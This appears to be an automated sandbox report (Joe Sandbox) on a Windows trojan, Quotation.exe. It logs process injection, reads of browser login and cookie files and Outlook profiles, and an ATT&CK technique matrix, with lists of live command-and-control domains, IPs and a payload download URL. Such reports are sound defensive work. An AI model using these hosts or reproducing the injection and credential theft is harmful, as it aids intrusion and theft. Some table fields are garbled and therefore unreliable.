        Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\control.exe | Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF752290000
        Source: C:\Windows\SysWOW64\control.exe | Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF752290000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\Quotation.exe | Thread APC queued: target process: C:\Windows\explorer.exe
        Source: C:\Users\user\Desktop\Quotation.exe | Thread register set: target process: 4712
        Source: C:\Windows\SysWOW64\control.exe | Thread register set: target process: 4712
        Source: C:\Users\user\Desktop\Quotation.exe | Process created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exe
        Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22641272696.0000000000D71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
        Source: explorer.exe, 0000000C.00000000.22661249542.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CA42000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22641272696.0000000000D71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: explorer.exe, 0000000C.00000002.26407020522.0000000000D70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22641272696.0000000000D71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
        Source: explorer.exe, 0000000C.00000000.22639249387.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26403643909.00000000004B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +ProgmanK
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

        Stealing of Sensitive Information

        Source: Yara match | File source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\control.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
        Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

        Remote Access Functionality

        Source: Yara match | File source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        MITRE ATT&CK matrix (techniques listed per tactic; a number in parentheses is the report's match count for that technique)

        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
        Execution: Native API (1); Shared Modules (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
        Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
        Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (712); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
        Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); Timestomp (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (12); Access Token Manipulation (1); Process Injection (712)
        Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
        Discovery: File and Directory Discovery (3); System Information Discovery (5); Security Software Discovery (121); Virtualization/Sandbox Evasion (12); Process Discovery (2); Application Window Discovery (1); Network Sniffing; Network Service Scanning; System Network Connections Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
        Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
        Command and Control: Ingress Tool Transfer (3); Encrypted Channel (11); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Generate Fraudulent Advertising Revenue
        Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Data Encrypted for Impact; Data Destruction
        Behavior Graph ID: 830618, Sample: Quotation.exe, Start date: 20/03/2023, Architecture: WINDOWS, Score: 100
        • Start: contacts www.texasgent.com, www.solya-shop.com and 20 other IPs or domains; signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures
        • Quotation.exe started; dropped files: C:\Users\user\AppData\Local\...\System.dll (PE32), C:\Users\user\AppData\Local\...\System.dll (PE32), C:\Users\user\AppData\...\percentile.dll (PE32+), 5 other files (none is malicious); signature: Tries to detect Any.run
        • Quotation.exe (second instance) started; contacts www.wittofitentertainment.com 162.240.73.101, 443, 49854 UNIFIEDLAYER-AS-1US United States; signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 2 other signatures
        • explorer.exe injected; contacts www.interactive-media.ru 88.212.206.251, 49858, 49921, 80 UNITEDNETRU Russian Federation; www.brightfms.com 81.17.18.196, 49909, 49910, 49911 PLI-ASCH Switzerland; 12 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)
        • control.exe started; signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Writes to foreign memory regions; 3 other signatures
        • firefox.exe started
        • WerFault.exe started

        Source | Detection | Scanner | Label
        Quotation.exe | 19% | Virustotal |
        Quotation.exe | 26% | ReversingLabs | Win32.Trojan.Generic

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\SolutionExplorerCLI.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\System.Security.Cryptography.X509Certificates.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\libdatrie-1.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\libpkcs11-helper-1.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\maintenanceservice2.exe | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\percentile.dll | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Temp\nsi3181.tmp\System.dll | 0% | ReversingLabs |

        Source | Detection | Scanner | Label
        12.2.explorer.exe.13773814.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
        10.0.Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
        1.0.Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
        1.2.Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
        13.2.control.exe.4dd3814.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
        14.2.firefox.exe.129e3814.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
        Source | Detection | Scanner | Label
        td-ccm-168-233.wixdns.net | 0% | Virustotal |
        SourceDetectionScannerLabelLink
        http://www.dexmart.xyz/d91r/0%Avira URL Cloudsafe
        http://www.texasgent.comwww.brightfms.com0%Avira URL Cloudsafe
        http://www.solya-shop.com/d91r/0%Avira URL Cloudsafe
        http://www.interactive-media.ru/d91r/0%Avira URL Cloudsafe
        http://www.eta-trader.netwww.funvacayflorida.com0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://www.decoraptor.store/d91r/0%Avira URL Cloudsafe
        http://www.brightfms.com/d91r/?6SE=F8zFuLn&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK0%Avira URL Cloudsafe
        http://www.184411.com0%Avira URL Cloudsafe
        http://www.cactus-market.ru/d91r/0%Avira URL Cloudsafe
        http://www.b-tek.media/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://schemas.microsoft.c0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
        http://www.184411.com/d91r/0%Avira URL Cloudsafe
        http://www.julesgifts.co.ukwww.aznqmd.com0%Avira URL Cloudsafe
        http://www.b-tek.media/d91r/0%Avira URL Cloudsafe
        http://www.rt66omm.com0%Avira URL Cloudsafe
        http://www.eta-trader.net/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.texasgent.com/d91r/?6SE=F8zFuLn&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK0%Avira URL Cloudsafe
        http://www.julesgifts.co.uk/d91r/0%Avira URL Cloudsafe
        http://www.rt66omm.com/d91r/0%Avira URL Cloudsafe
        http://www.maxhaidt.com/d91r/?z4=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.184411.com/d91r/?z4=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.ghostdyes.net/d91r/?z4=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.dexmart.xyzwww.finelinetackdirect.com0%Avira URL Cloudsafe
        http://www.eta-trader.net0%Avira URL Cloudsafe
        http://www.funvacayflorida.com/d91r/0%Avira URL Cloudsafe
        http://www.ghostdyes.net/d91r/0%Avira URL Cloudsafe
        http://www.texasgent.com/d91r/0%Avira URL Cloudsafe
        http://www.solya-shop.com0%Avira URL Cloudsafe
        http://www.solya-shop.comwww.buymyenergy.com0%Avira URL Cloudsafe
        http://www.aznqmd.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.finelinetackdirect.comwww.maxhaidt.com0%Avira URL Cloudsafe
        http://www.brightfms.comwww.eta-trader.net0%Avira URL Cloudsafe
        https://www.wittofitentertainment.com/kGQffjENy187.binZ0%Avira URL Cloudsafe
        http://www.qx386.top0%Avira URL Cloudsafe
        http://www.ghostdyes.net0%Avira URL Cloudsafe
        http://www.b-tek.mediawww.dexmart.xyz0%Avira URL Cloudsafe
        https://www.wittofitentertainment.com/kGQffjENy187.binR0%Avira URL Cloudsafe
        http://www.decoraptor.store/d91r/_w7xz=bR5Glu0%Avira URL Cloudsafe
        http://www.interactive-media.ru/d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn0%Avira URL Cloudsafe
        https://solya-shop.com/d91r/?z4=7PV8upFW6FVa3k/MU0%Avira URL Cloudsafe
        http://www.dexmart.xyz/d91r/?z4=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.flaviosilva.online0%Avira URL Cloudsafe
        http://www.texasgent.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.cactus-market.ru0%Avira URL Cloudsafe
        http://www.brightfms.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.funvacayflorida.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.brightfms.com0%Avira URL Cloudsafe
        http://www.buymyenergy.comwww.184411.com0%Avira URL Cloudsafe
        http://www.cardinialethanol.com/d91r/0%Avira URL Cloudsafe
        http://www.buymyenergy.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.flaviosilva.onlinewww.solya-shop.com0%Avira URL Cloudsafe
        https://www.wittofitentertainment.com/kGQffjENy187.bin00%Avira URL Cloudsafe
        http://www.maxhaidt.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.julesgifts.co.uk0%Avira URL Cloudsafe
        http://www.buymyenergy.com0%Avira URL Cloudsafe
        http://www.cardinialethanol.com0%Avira URL Cloudsafe
        http://23.83.160.2:88/tz.php?ref=0%Avira URL Cloudsafe
        http://www.aznqmd.com0%Avira URL Cloudsafe
        http://www.dexmart.xyz/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        http://www.flaviosilva.online/d91r/0%Avira URL Cloudsafe
        http://www.solya-shop.com/d91r/6SE=F8zFuLn0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        www.buymyenergy.com
        45.194.145.38
        truetrue
          unknown
          www.cardinialethanol.com
          198.58.118.167
          truetrue
            unknown
            td-ccm-168-233.wixdns.net
            34.117.168.233
            truetrueunknown
            eta-trader.net
            2.57.90.16
            truetrue
              unknown
              bb.zhanghonghong.com
              154.215.156.6
              truetrue
                unknown
                www.solya-shop.com
                217.160.0.217
                truetrue
                  unknown
                  www.funvacayflorida.com
                  208.91.197.91
                  truetrue
                    unknown
                    www.aznqmd.com
                    23.83.160.9
                    truetrue
                      unknown
                      www.b-tek.media
                      91.184.0.24
                      truetrue
                        unknown
                        www.dexmart.xyz
                        199.192.26.35
                        truetrue
                          unknown
                          www.texasgent.com
                          81.17.29.148
                          truetrue
                            unknown
                            www.maxhaidt.com
                            172.67.212.220
                            truetrue
                              unknown
                              www.wittofitentertainment.com
                              162.240.73.101
                              truefalse
                                unknown
                                flaviosilva.online
                                2.57.90.16
                                truetrue
                                  unknown
                                  www.interactive-media.ru
                                  88.212.206.251
                                  truetrue
                                    unknown
                                    www.brightfms.com
                                    81.17.18.196
                                    truetrue
                                      unknown
                                      www.flaviosilva.online
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.184411.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.eta-trader.net
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.finelinetackdirect.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.ghostdyes.net
                                              unknown
                                              unknowntrue
                                                unknown
                                                NameMaliciousAntivirus DetectionReputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.flaviosilva.onlineexplorer.exe, 0000000C.00000002.26447616081.0000000011109000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.msn.com/en-us/money/other/7-common-travel-mistakes-every-rv-owner-has-made/ss-AAOGa8lexplorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.buymyenergy.comwww.184411.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.buymyenergy.com/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.flaviosilva.onlinewww.solya-shop.comexplorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.wittofitentertainment.com/kGQffjENy187.bin0Quotation.exe, 0000000A.00000003.22206133990.0000000003210000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003213000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22630827265.0000000003213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.julesgifts.co.ukexplorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl_banneexplorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://browsehappy.com/explorer.exe, 0000000C.00000002.26450887427.0000000014AEA000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000614A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://wns.windows.com/cc6424aexplorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.webnames.ru/help/feedback?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindowexplorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.maxhaidt.com/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://www.buymyenergy.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://www.cardinialethanol.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://23.83.160.2:88/tz.php?ref=explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://www.aznqmd.comexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://www.dexmart.xyz/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://support.google.com/chrome/?p=plugin_flashcontrol.exe, 0000000D.00000002.26417532491.0000000007600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.solya-shop.com/d91r/6SE=F8zFuLnexplorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs
                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        91.184.0.24
                                                                                                                        www.b-tek.mediaNetherlands
                                                                                                                        197902HOSTNETNLtrue
                                                                                                                        45.194.145.38
                                                                                                                        www.buymyenergy.comSeychelles
                                                                                                                        134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                        199.192.26.35
                                                                                                                        www.dexmart.xyzUnited States
                                                                                                                        22612NAMECHEAP-NETUStrue
                                                                                                                        217.160.0.217
                                                                                                                        www.solya-shop.comGermany
                                                                                                                        8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                        154.215.156.6
                                                                                                                        bb.zhanghonghong.comSeychelles
                                                                                                                        134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                        34.117.168.233
                                                                                                                        td-ccm-168-233.wixdns.netUnited States
                                                                                                                        139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                                                                                                        81.17.18.196
                                                                                                                        www.brightfms.comSwitzerland
                                                                                                                        51852PLI-ASCHtrue
                                                                                                                        23.83.160.9
                                                                                                                        www.aznqmd.comUnited States
                                                                                                                        7203LEASEWEB-USA-SFO-12UStrue
                                                                                                                        162.240.73.101
                                                                                                                        www.wittofitentertainment.comUnited States
                                                                                                                        46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                        208.91.197.91
                                                                                                                        www.funvacayflorida.comVirgin Islands (BRITISH)
                                                                                                                        40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                        81.17.29.148
                                                                                                                        www.texasgent.comSwitzerland
                                                                                                                        51852PLI-ASCHtrue
                                                                                                                        88.212.206.251
                                                                                                                        www.interactive-media.ruRussian Federation
                                                                                                                        39134UNITEDNETRUtrue
                                                                                                                        2.57.90.16
                                                                                                                        eta-trader.netLithuania
                                                                                                                        47583AS-HOSTINGERLTtrue
                                                                                                                        172.67.212.220
                                                                                                                        www.maxhaidt.comUnited States
                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                        198.58.118.167
                                                                                                                        www.cardinialethanol.comUnited States
                                                                                                                        63949LINODE-APLinodeLLCUStrue
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830618
Start date and time: 2023-03-20 14:56:34 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 10s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Quotation.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@11/11@18/15
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 14.4% (good quality ratio 13.9%)
• Quality average: 81.7%
• Quality standard deviation: 25.8%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000 ms are automatically reduced to 1000 ms
• Excluded processes from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
• HTTP packets have been reduced
• TCP packets have been reduced to 100
